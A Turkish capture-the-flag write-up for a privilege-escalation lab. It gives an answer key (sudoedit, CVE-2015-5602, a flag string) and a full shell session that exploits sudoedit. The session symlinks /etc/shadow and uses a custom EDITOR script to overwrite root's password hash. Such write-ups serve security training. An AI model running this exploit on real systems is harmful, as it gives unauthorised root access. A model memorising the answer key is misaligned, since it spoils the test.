# Privilege Escalation 1 - Vulnerable Services


**Açıklama**:

Zaafiyetli servisleri kullanarak yetkinizi root'a yükselterek sistemi ele geçirin.

**Amaç**:

- Zaafiyetli servisi bulmak
- Zaafiyetli servisin CVE ID'sini bulmak
- Yetki yükselterek sistemi ele geçirmek
- /flag.txt'i okumak

**Flags**:
- Vulnrable servis nedir?
    - answer: **sudoedit**
- Vulnrable servise ait CVE?
    - answer: **CVE-2015-5602**
- flag.txt?
    - answer: **CyberPath{W8YdaBUFGXytJ72x}**

## **Solution**:

```bash
victim@ubuntu:~$ uname -a
Linux ubuntu 5.13.0-1022-aws #24~20.04.1-Ubuntu SMP Thu Apr 7 22:10:15 UTC 2022 x86_64 GNU/Linux
victim@ubuntu:~$ id
uid=1000(victim) gid=1000(victim) groups=1000(victim)
victim@ubuntu:~$ ls -la
total 20
drwxr-xr-x 2 victim victim 4096 May  2 08:55 .
drwxr-xr-x 1 root   root   4096 May  2 08:55 ..
-rw-r--r-- 1 victim victim  220 May 15  2017 .bash_logout
-rw-r--r-- 1 victim victim 3526 May 15  2017 .bashrc
-rw-r--r-- 1 victim victim  675 May 15  2017 .profile
victim@ubuntu:~$ crontab -l
bash: crontab: command not found
victim@ubuntu:~$ sudo -V
Sudo version 1.8.13
Sudoers policy plugin version 1.8.13
Sudoers file grammar version 44
Sudoers I/O plugin version 1.8.13
victim@ubuntu:~$ sudo -l
User victim may run the following commands on ubuntu:
    (root) NOPASSWD: sudoedit /home/*/*/esc.txt
victim@ubuntu:~$ export EDITOR="/tmp/edit"
victim@ubuntu:~$ export FOLDER="/home/bin/escape"
victim@ubuntu:~$ export PASSWD="12345"
victim@ubuntu:~$ cat << EOF >> /tmp/edit
> #!/usr/bin/env bash
> pass="$(printf "%q" $(openssl passwd -1 -salt ${RANDOM} ${PASSWD}))"
> sed -i -e  "s,^root:[^:]\+:,root:\${pass}:," \${1}
> EOF
victim@ubuntu:~$ mkdir -p /home/victim/escape
victim@ubuntu:~$ ln -sf /etc/shadow /home/victim/escape/esc.txt
victim@ubuntu:~$ chmod +x ${EDITOR}
victim@ubuntu:~$ sudoedit /home/victim/escape/esc.txt
victim@ubuntu:~$ su -
Password: 
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# cat /flag.txt
CyberPath{flag}
root@ubuntu:~# 
```